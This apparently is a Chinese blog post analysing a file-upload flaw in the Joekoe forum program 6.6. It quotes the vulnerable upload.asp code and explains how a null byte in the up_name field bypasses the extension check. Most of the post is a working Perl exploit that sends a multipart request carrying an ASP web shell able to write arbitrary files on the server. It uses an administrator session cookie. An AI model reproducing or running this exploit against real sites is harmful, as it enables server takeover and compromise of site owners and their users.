前言：昨天看黑防网站看到黑防第8期上有篇文章《乔客论坛惊爆UPfile严重漏洞》，无奈阿，我这里买不到黑防，只能自己分析分析看看，以下是针对乔客整站程序免费6.6版。
    先看upload.asp代码：

<%
dim formname,upload_path,upload_type,upload_size,uup
uup="|article|down|forum|gallery|news|other|product|video|website|"
．
．
．
．
  up_name=trim(upload.form("up_name"))
  up_text=trim(upload.form("up_text"))
  up_path=trim(upload.form("up_path"))
  if session("joekoe_online_admin")<>"joekoe_admin" and len(up_name)>2 then up_name=""
  if len(up_name)<3 then up_name=up_name&upload_time(now_time)
  if int(instr(uup,"|"&up_path&"|"))=0 then up_path="other"
  if len(up_path)<3 then up_path="other"
  uppath=up_path
  if right(upload_path,1)<>"/" then upload_path=upload_path&"/"
  up_path=server.mappath(upload_path&up_path)
．
．
      upfile_name=Right(upfilename,(len(upfilename)-Instr(upfilename,".")))
      upfile_name=lcase(upfile_name)
      if instr(","&upload_type&",",","&upfile_name&",")>0 then
        upfile_name2=upfile_name
        upfile_name=up_name&"."&upfile_name
        upfile.SaveAs up_path&upfile_name
．
．
      else
        uptemp="<font class=red_2>上传失败</font>：文件类型只能为："&replace(upload_type,"|","、")&"等格式) "&go_back
      end if
．
．
．

看几个提交的变量，up_name,up_path，up_text，upfile_name。先看up_path 部分，也就是这里：
if int(instr(uup,"|"&up_path&"|"))=0 then up_path="other"
只要up_path的值不包含在uup 里边也就是:
article,down,forum,gallery,news,other,product,video,website
里边up_path就变成了other目录了，这里我们没有用武之地。再看upfile_name，也就是文件扩展名:
upfile_name=Right(upfilename,(len(upfilename)-Instr(upfilename,".")))
他这个过滤的比较严格，甚至于文件名里边只能有一个.符号，如果文件名是asp.asp.gif也被认为非法，因为他是从第一个.号开始截取到末尾的,放弃这个。代码里很明显up_text对我们来说无用。只剩up_name这个了:

  if session("joekoe_online_admin")<>"joekoe_admin" and len(up_name)>2 then up_name=""
  if len(up_name)<3 then up_name=up_name&upload_time(now_time)

如果我们不是用管理员身份登陆过后台，也就是session("joekoe_online_admin")<>"joekoe_admin"，只要up_name长度达于2，up_name就成了空值，郁闷，不过当session("joekoe_online_admin")="joekoe_admin"，我们可以利用，利用程序如下(cookie需要admin的):

#!/usr/bin/perl
$| = 1;
use Socket;
$host = "10.0.0.1";
$port = "80";
$str =
"-----------------------------7d41869a401aa\r\n".
"Content-Disposition: form-data; name=\"up_path\"\r\n".
"\r\n".
"gallery\r\n".
"-----------------------------7d41869a401aa\r\n".
"Content-Disposition: form-data; name=\"up_name\"\r\n".
"\r\n".
"p.asp\0\r\n".
"-----------------------------7d41869a401aa\r\n".
"Content-Disposition: form-data; name=\"up_text\"\r\n".
"\r\n".
"spic\r\n".
"-----------------------------7d41869a401aa\r\n".
"Content-Disposition: form-data; name=\"file_name1\"; filename=\"F:\\tools\\sql\\getwebs\\p.gif\"\r\n".
"Content-Type: text/plain\r\n".
"\r\n".
"<%dim objFSO%>\r\n".
"<%dim fdata%>\r\n".
"<%dim objCountFile%>\r\n".
"<%on error resume next%>\r\n".
"<%Set objFSO = Server.CreateObject(\"Scripting.FileSystemObject\")%>\r\n".
"<%if Trim(request(\"syfdpath\"))<>\"\" then%>\r\n".
"<%fdata = request(\"cyfddata\")%>\r\n".
"<%Set objCountFile=objFSO.CreateTextFile(request(\"syfdpath\"),True)%>\r\n".
"<%objCountFile.Write fdata%>\r\n".
"<%if err =0 then%>\r\n".
"<%response.write \"<font color=red>save Success!</font>\"%>\r\n".
"<%else%>\r\n".
"<%response.write \"<font color=red>Save UnSuccess!</font>\"%>\r\n".
"<%end if%>\r\n".
"<%err.clear%>\r\n".
"<%end if%>\r\n".
"<%objCountFile.Close%>\r\n".
"<%Set objCountFile=Nothing%>\r\n".
"<%Set objFSO = Nothing%>\r\n".
"<%=server.mappath(Request.ServerVariables(\"SCRIPT_NAME\"))%>\r\n".
"-----------------------------7d41869a401aa\r\n".
"Content-Disposition: form-data; name=\"submit\"\r\n".
"\r\n".
"点击上传\r\n".
"-----------------------------7d41869a401aa\r\n".
"\r\n";
print $str;
$len=length($str);

$req ="POST /jj/upload.asp?action=upfile HTTP/1.0\r\n".
#"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/msword, */*\r\n".
"Referer: http://10.0.0.1/jj/upload.asp?uppath=gallery&upname=gs200483164242&uptext=spic\r\n".
#"Accept-Language: zh-cn\r\n".
"Content-Type: multipart/form-data; boundary=---------------------------7d41869a401aa\r\n".
#"Accept-Encoding: gzip, deflate\r\n".
#"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; (R1 1.5); .NET CLR 1.1.4322)\r\n".
"Host: 10.0.0.1\r\n".
"Content-Length: $len\r\n".
#"Connection: Keep-Alive\r\n".
#"Cache-Control: no-cache\r\n".
"Cookie: ASPSESSIONIDQAQQRCTQ=DOKDHBIALDIDGJFJMCMMIBFJ; joekoe%5Fonline=login%5Fpassword=dd15f89d35c36afb&guest%5Fname=&login%5Fusername=joekoe&counters=yes\r\n".
"\r\n".
"$str";
print $req;
@res = sendraw($req);
print @res;

#Hmm...Maybe you can send it by other way

sub sendraw {
    my ($req) = @_;
    my $target;
    $target = inet_aton($host) || die("inet_aton problems\n");
    socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems\n");
    if(connect(S,pack "SnA4x8",2,$port,$target)){
        select(S);
    $| = 1;
        print $req;
    my @res = <S>;
        select(STDOUT);
    close(S);
        return @res;
    }
    else {
    die("Can't connect...\n");
    }
}

后记：极度郁闷中。。。。。。。，谁能把黑防的文章给偶看看？